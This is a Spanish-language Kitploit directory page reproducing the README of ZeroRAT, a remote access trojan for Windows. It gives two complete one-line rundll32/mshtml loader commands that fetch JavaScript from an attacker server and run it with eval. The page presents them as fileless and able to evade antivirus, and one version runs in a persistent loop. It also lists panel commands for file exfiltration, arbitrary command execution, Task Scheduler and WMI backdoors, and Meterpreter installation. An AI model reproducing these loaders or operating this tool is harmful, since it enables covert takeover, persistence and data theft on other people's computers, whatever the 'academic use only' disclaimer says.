Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ZeroRAT — ZeroRAT es un control remoto de una sola línea para Windows. | Kitploit
Herramientas/GitHubGitHub/5alt/zerorat
Escalada de PrivilegiosGeneración de PayloadsMecanismos de PersistenciaExplotaciónMovimiento LateralShellcodeExfiltración de DatosPost-ExplotaciónComando y ControlHerramienta de Acceso RemotoGeneración de ShellcodeTroyano de Acceso Remoto
6332hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub5alt/zerorat

ZeroRAT

ZeroRAT es un control remoto de una sola línea para Windows.

Ver Repositorio
Compartir

#ZeroRAT ##Introducción Herramienta de control remoto (RAT) para Windows. El cliente solo necesita ejecutar una única instrucción; utiliza programas nativos de Windows para ejecutarse, no escribe archivos en el disco y cuenta con características naturales de evasión de antivirus. Deja de funcionar tras reiniciar.

En el programa, "download" y "upload" se refieren a la perspectiva del cliente. Cuando el cliente descarga un archivo desde el servidor se llama "download"; cuando el cliente sube un archivo al servidor se llama "upload".

##Configuración Modifica la dirección de conexión del cliente y la contraseña de administración del panel en config.py. Recuerda comprobar que la depuración (debug) esté desactivada.

El programa depende de Flask y sqlite3; instálalos tú mismo con pip.

##Cliente Reemplaza <ip>:<port> por la dirección de conexión real.

Versión normal

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

Versión persistente

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

##Servidor Panel: http://<ip>:<port>/server/

Los comandos compatibles con el servidor son:

  • sessions Lista los clientes activos
  • use <id> Selecciona un cliente según su id
  • set <key> <value> Establece variables globales
  • show globals/downloads/uploads Muestra las variables globales, los archivos que el cliente puede descargar y los archivos subidos por el cliente
  • delete session Elimina el cliente actual
  • delete download/upload <id> Elimina archivos según su id
  • upfile Sube un archivo al servidor y lo añade a la lista de downloads
  • download Establece las variables download_file y download_save_path para que el cliente descargue el archivo y lo guarde en download_save_path
  • upload Establece la variable upload_file para que el cliente suba el archivo en upload_file al servidor
  • backdoor tasks <time> Deja una puerta trasera mediante el Programador de tareas de Windows; formato de hora: 00:00
  • backdoor wmi Deja una puerta trasera mediante WMI; se ejecuta una vez cada hora

Excepto los comandos indicados anteriormente, todo lo demás se ejecutará como un comando del sistema de Windows.

Consulta los detalles de los comandos en /static/js/xkcd_cli.js

##Desarrollo Comandos del panel que gestionan el cliente: /static/js/xkcd_cli.js

Comandos del panel que gestionan el servidor: /controllers/server.py

Mantenimiento del cliente: /controllers/client.py

Generación del payload del cliente: payload.py

Operaciones relacionadas con la base de datos: /models/

##Contacto http://5alt.me

md5_salt [AT] qq.com

##Referencias https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

##Descargo de responsabilidad Al usar esta herramienta, cumple con las leyes locales. Solo debe utilizarse con fines de prueba académica; está estrictamente prohibido controlar ilegalmente equipos ajenos. Si se causan daños, el autor no se hace responsable.

##License GPLV3

##TODO

  • Mejorar los comandos
  • Cifrar el tráfico de comunicaciones
Descargar herramienta
  • meterpreter shellcode Instala Meterpreter mediante shellcode con InstallUtil; primero debes establecer LHOST y LPORT (solo se pueden seguir recibiendo comandos después de migrar; depende de .NET Framework 2.0)
  • meterpreter powershell Instala Meterpreter mediante PowerShell (depende de PowerShell 1.0)